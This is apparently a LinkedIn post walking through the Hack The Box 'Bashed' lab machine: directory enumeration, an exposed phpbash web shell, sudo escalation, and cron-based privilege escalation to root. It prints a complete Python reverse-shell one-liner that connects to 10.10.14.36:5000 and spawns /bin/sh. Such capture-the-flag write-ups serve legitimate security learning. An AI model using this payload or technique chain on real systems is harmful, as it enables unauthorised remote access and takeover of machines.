登录查看更多内容

Bashed box on Hack the Box Write up

Jean-Michel Frouin

Driving Technology Strategy and Innovation as Software Development Manager

发布日期: 2020年12月21日

+ 关注

OS: Linux

Difficulty: Easy

Points: 20

Release: 09 Dec 2017

IP: 10.10.10.68

Enumeration

Ports

80/tcp open tcpwrapped

Apache httpd 2.4.18 (Ubuntu)

Web

dirbuster

jm@kali:~$ dirbuster

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true Starting OWASP DirBuster 1.0-RC1 

Starting dir/file list based brute forcing
Dir found: / -
200 File found: /index.html -
200 File found: /index.html -

200 File found: /single.html - 
200 Dir found: /js/ - 
200 File found: /js/jquery.js - 
200 File found: /js/imagesloaded.pkgd.js - 
200 File found: /js/jquery.nicescroll.min.js - 
200 File found: /js/jquery.smartmenus.min.js - 
200 File found: /js/jquery.carouFredSel-6.0.0-packed.js - 
200 File found: /js/jquery.mousewheel.min.js - 
200 File found: /js/jquery.touchSwipe.min.js - 
200 Dir found: /demo-images/ - 
200 File found: /js/jquery.easing.1.3.js - 
200 File found: /js/main.js - 
200 File found: /js/custom_google_map_style.js - 
200 File found: /js/html5.js - 
200 Dir found: /icons/ - 
403 File found: /config.php - 
200 Dir found: /css/ - 
200 Dir found: /images/ - 
200 Dir found: /dev/ - 
200 File found: /css/carouFredSel.css - 
200 File found: /css/clear.css - 
200 File found: /css/common.css - 
200 File found: /dev/phpbash.min.php - 
200 File found: /css/font-awesome.min.css - 
200 File found: /css/sm-clean.css - 
200 File found: /dev/phpbash.php - 
200 Dir found: /php/ - 
200 File found: /php/sendMail.php - 
200 Dir found: /uploads/ - 
200 Dir found: /icons/small/ - 
403 /dev/phpbash.php

/php

/php/sendmail.php

/dev/phpbash.min.php

Exploitation

Using phpbash.php

User Flag

/home/arrexel/user.txt

Priv Esc

sudo -l

sudo -u scriptmanager bash

discover /script

test.txt created by test.py using cron each minute

Reverse Shell

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.36”,5000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Root Flag

As always just

cat /root/root.txt

Jean-Michel Frouin的更多文章

Shocker box on Hack the Box Write up #htb

2020年12月22日

Shocker box on Hack the Box Write up #htb

OS: Linux Difficulty: Easy Points: 20 Release: 30 Sep 2017 IP: 10.10.

Bashed box on Hack the Box Write up

Jean-Michel Frouin

Driving Technology Strategy and Innovation as Software Development Manager

Enumeration

Ports

Web

Exploitation

User Flag

Priv Esc

Reverse Shell

Root Flag

Jean-Michel Frouin的更多文章

社区洞察

其他会员也浏览了

Created my own API interface to run Linux commands.????

Launching graphical application inside the docker container

Deploy Ceph Using Cephadm

CVE-2023-4911 - Privilege escalation in glibc

How to Install Apache HTTPD Server on CentOS?

Red Hat / CentOS - Use Python, YAML, and Jinja2 to template yum.conf

Compiling Exploits For Old Machines

Tryhackme: What's Your Name? Writeup.

Step-by-Step Guide: Deploying a React App on CentOS 7 Apache Web Server

GUI APPLICATION ON DOCKER CONTAINER

Enumeration

Ports

Web

Exploitation

User Flag

Priv Esc

Reverse Shell

Root Flag

Jean-Michel Frouin的更多文章

Shocker box on Hack the Box Write up #htb

社区洞察

其他会员也浏览了

Created my own API interface to run Linux commands.????

Launching graphical application inside the docker container

Deploy Ceph Using Cephadm

CVE-2023-4911 - Privilege escalation in glibc

How to Install Apache HTTPD Server on CentOS?

Red Hat / CentOS - Use Python, YAML, and Jinja2 to template yum.conf

Compiling Exploits For Old Machines

Tryhackme: What's Your Name? Writeup.

Step-by-Step Guide: Deploying a React App on CentOS 7 Apache Web Server

GUI APPLICATION ON DOCKER CONTAINER